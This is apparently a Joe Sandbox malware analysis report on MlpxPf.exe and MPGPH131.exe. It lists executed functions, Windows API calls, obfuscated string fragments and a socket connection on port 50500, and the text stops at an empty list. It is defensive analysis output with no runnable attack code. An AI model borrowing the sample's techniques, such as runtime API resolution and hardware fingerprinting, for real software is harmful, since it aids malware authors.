Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 7170c569d8b37a58bf576b864975600726316c75a835579d88be71af4bfe2629
Instruction ID: 2c77f39cef65adf56ede276f8d2c56280a2754d8e7efffc2d4c3feaae56a3219
Opcode Fuzzy Hash: 7170c569d8b37a58bf576b864975600726316c75a835579d88be71af4bfe2629
Instruction Fuzzy Hash: 0B01D6B29143196FEB235760EC49FD7779CDB04356F050066EE46E30F0EAB49A888BE0

Function 0035185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00351F92,00000000,?,00000000,?,?,?,00351F92,?,00000000,00000002), ref: 00351867
srand.MSVCRT ref: 00351878
rand.MSVCRT ref: 00351880
srand.MSVCRT ref: 00351890
rand.MSVCRT ref: 00351894

Memory Dump Source

Source File: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: 2d03ef7a15545644d7d9df894f7488148bcac7093af4db5f3ac9b7b98d28bb4d
Instruction ID: 17e3f1ed205abe5e246e90228bccc6272aec5e49bd38d2920f6da22b4c9809d0
Opcode Fuzzy Hash: 2d03ef7a15545644d7d9df894f7488148bcac7093af4db5f3ac9b7b98d28bb4d
Instruction Fuzzy Hash: B5E0D877A10318BBD701A7F9EC4689EBBACDE842B2F100527F601D32A0E570FD448AB4

Function 00356014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0035603C
GetProcAddress.KERNEL32(00000000,00356064), ref: 0035604F

Strings

kernel32.dll, xrefs: 0035603B

Memory Dump Source

Source File: 00000002.00000002.1570334960.0000000000356000.00000040.00000001.01000000.00000004.sdmp, Offset: 00350000, based on PE: true

Associated: 00000002.00000002.1570248598.0000000000350000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570272397.0000000000351000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570296081.0000000000353000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1570316174.0000000000354000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_350000_MlpxPf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 788e5fbc9a19684046a95bdb48ef234931b5418e66a274c67c5318035c7d04a5
Instruction ID: 930c5b6b07dc77c4452a072fa188ef922a311be30a2422acd1a461ca5eb08d8f
Opcode Fuzzy Hash: 788e5fbc9a19684046a95bdb48ef234931b5418e66a274c67c5318035c7d04a5
Instruction Fuzzy Hash: F3F0F0F11442898FEF718EA4CC45FEE3BE4EB15711F90052AEE09CB291DB3486098B24

Analysis Process: MPGPH131.exePID: 6312, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	3.8%
Signature Coverage:	0%
Total number of Nodes:	210
Total number of Limit Nodes:	34

Executed Functions

Function 00E07044 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00E07223

Strings

.dll, xrefs: 00E07102
WinE, xrefs: 00E07110
catA, xrefs: 00E071AF
Writ, xrefs: 00E07148
odul, xrefs: 00E0722D
Crea, xrefs: 00E07169
el32, xrefs: 00E070FB
GetT, xrefs: 00E07188
MlpxPf.exe, xrefs: 00E071FD, 00E07200
athA, xrefs: 00E07199
lstr, xrefs: 00E071A7
dleA, xrefs: 00E070D0
GetM, xrefs: 00E070B6
Kern, xrefs: 00E070F4
Clos, xrefs: 00E07129

Memory Dump Source

Source File: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .dll$Clos$Crea$GetM$GetT$Kern$MlpxPf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 823142352-650681566
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: 42c59f00e1eedd9f801db889e395201809067f4dbc25380a7ce7abbf80ff645a
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 63610D74D0A215DBCF24CF94C844AADB7B0BF48319F25A5AAD5857B2C1C370AEC1CB91

Function 0084DB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0084DB8B
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0084DC2E
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0084DC42
closesocket.WS2_32(00000000), ref: 0084DC4D

Strings

50500, xrefs: 0084DBE8
`4u, xrefs: 0084DC1E

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500$`4u
API String ID: 3098855095-1883443620
Opcode ID: 2dd402dd94c68f3afb362514ba8549ffd176e0b1d253c8c63ddf144f3637cb14
Instruction ID: 18081c6f53999451cd6635194afa742b9527dee88daed567605308f670ef726a
Opcode Fuzzy Hash: 2dd402dd94c68f3afb362514ba8549ffd176e0b1d253c8c63ddf144f3637cb14
Instruction Fuzzy Hash: 8E31A1726047496BC7209B288C84A3BB7E5FF89734F001F19F9A8932E0E37199158692

Function 04DE081F Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04DE0849

Memory Dump Source

Source File: 00000008.00000002.3931136502.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4de0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1deea5d023b642f0718dbb7ef1e6a26ba17fcf54b20df732b311bf8e1c2e0c53
Instruction ID: 45c55fc04c45c6700ac01b26fb8e84716ddd91f9b7bec110d9b3005935fb3ecf
Opcode Fuzzy Hash: 1deea5d023b642f0718dbb7ef1e6a26ba17fcf54b20df732b311bf8e1c2e0c53
Instruction Fuzzy Hash: D9313CFB74C125BCB102A5422F54EFB676DE2D6730331C82BF987D1406E3D49A4AA131

Function 04DE07D1 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04DE0849

Memory Dump Source

Source File: 00000008.00000002.3931136502.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4de0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 699bc0372b5cc6b476f90009b8c55e70b4d62cdbd0f593f8e55f0c1fc875444d
Instruction ID: 1ab494aefec4180d56d9dcbbf5bd7d0d58718f0ae26251d77de07ad59cef72e5
Opcode Fuzzy Hash: 699bc0372b5cc6b476f90009b8c55e70b4d62cdbd0f593f8e55f0c1fc875444d
Instruction Fuzzy Hash: 0B3137EB34C135BCB102A5432FA4EFB676DE1C6730730882BF987C1506E7D4AA4AA031

Function 04DE0831 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 04DE0849

Memory Dump Source

Source File: 00000008.00000002.3931136502.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4de0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: d55954a0bc11e43c44fc3d57489e00b73e24d918de9981ba7a0ddc462cc07596
Instruction ID: 89afb4939566edd56ae593d194f210734aec4ee8b641634e4f4828e6a1eaf1c6
Opcode Fuzzy Hash: d55954a0bc11e43c44fc3d57489e00b73e24d918de9981ba7a0ddc462cc07596
Instruction Fuzzy Hash: D731E7EB74C1357CB142A5422F64EFB576DE1D6730731C82BF987D1406E7D49A4AA031

Function 00922F0C Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,00916AF7,?,00000000,00000000,00000000,?,00000000,?,0090C023,00916AF7,00000000,0090C023,?,?), ref: 00923091

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: b8e88cba9b730368122fb856dafcbfcf02cb20959b88ded8e54b211938313fa9
Instruction ID: 81b277099e3d2b2559f3e718fac5f69e5afa326fa6bde8e6c35a2233945380b8
Opcode Fuzzy Hash: b8e88cba9b730368122fb856dafcbfcf02cb20959b88ded8e54b211938313fa9
Instruction Fuzzy Hash: 8A61E471D04129BFDF11DFA8E980AEEBBB9AF49304F144545E900AB25AC379DE119BA0

Function 0089BA20 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0089BB71

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction ID: 8e33831dd2dc053828fe30de0cc3f36ae52405c48670f1ee53602caf4269c2db
Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction Fuzzy Hash: CE41E2729011199FCF15EF68EE816AEB7A5FF84350F280669F815EB285D730DE1087D1

Function 00922582 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00922469,00000000,CF830579,00961148,0000000C,00922525,0091662D,?), ref: 009225D8

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 91ba625b15ef6db7a1e7d3386e278e35c2809f1bc4babcbf18cb77d5d9fb1044
Instruction ID: 270bec2bd5d537e4be6a08315a6d25854c8a3133834805f82901512c77573c25
Opcode Fuzzy Hash: 91ba625b15ef6db7a1e7d3386e278e35c2809f1bc4babcbf18cb77d5d9fb1044
Instruction Fuzzy Hash: 8811443360A23436D72123747C56F7F274E9BC3734F254209F9088B1CAEE659C815191

Function 0091BACC Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00960E00,0090C023,00000002,0090C023,00000000,?,?,?,0091BBD6,00000000,?,0090C023,00000002,00960E00), ref: 0091BB08

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 34141280174be12210c5d05990503a529de8040f4c78c6bcbda4d313fa92b8fb
Instruction ID: c69e8321526215cc29dae90d28546f77860bd65d2cd50f635a2b218fe2300d6a
Opcode Fuzzy Hash: 34141280174be12210c5d05990503a529de8040f4c78c6bcbda4d313fa92b8fb
Instruction Fuzzy Hash: 45012632714159AFDF068F59DC45DDE3B6AEF81330B240208F9019B2D1EB71ED818790

Function 0090CD02 Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00831FDE

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 781567110fbeea1bda257f4a7b9d5fcc70560875d0f2e973004847783e1755ea
Instruction ID: e6ccb5141cf9581a5bde89276abba0c05989dfeffbf60cda4aa9a53057010b58
Opcode Fuzzy Hash: 781567110fbeea1bda257f4a7b9d5fcc70560875d0f2e973004847783e1755ea
Instruction Fuzzy Hash: C001D67550430DBBCB24ABA8EC0198A7BACDE41764B508A35F918EB5D1FBB0E59087D1

Function 00923E63 Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,0090B16C,?,?,009237E9,00000001,00000364,?,00000006,000000FF,?,0090E0EB,?,?,?,?), ref: 00923EA4

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e960d014f3c8ae318d272a9043a6516235157a519ff08182985810210f45c651
Instruction ID: 4b54c51d10aedeee38a2eaf0b13e9be615ccfdb40c5853ba60d2232ba9781cba
Opcode Fuzzy Hash: e960d014f3c8ae318d272a9043a6516235157a519ff08182985810210f45c651
Instruction Fuzzy Hash: B6F0E932605135679B326A71BC06B9F774EBF81760B17C516FC08A6098CB78EE0886E1

Function 0092489D Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0090E0EB,?,?,?,?,?,00832D8D,0090B16C,?,?,0090B16C), ref: 009248D0

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: da0bc919526d4f87da7a66c8000839d6befd30f46a856a193391caf02e35c624
Instruction ID: 165b2fea8b796bf76ac9b7ef40a3b5b52bc0e6afde2698107032f618ebf9328d
Opcode Fuzzy Hash: da0bc919526d4f87da7a66c8000839d6befd30f46a856a193391caf02e35c624
Instruction Fuzzy Hash: 3CE06D312666B5A7EA213775BC05BAB764DCF827A0F160631AC58A6098DBA0DC5092E2

Non-executed Functions

Function 0089AE90 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

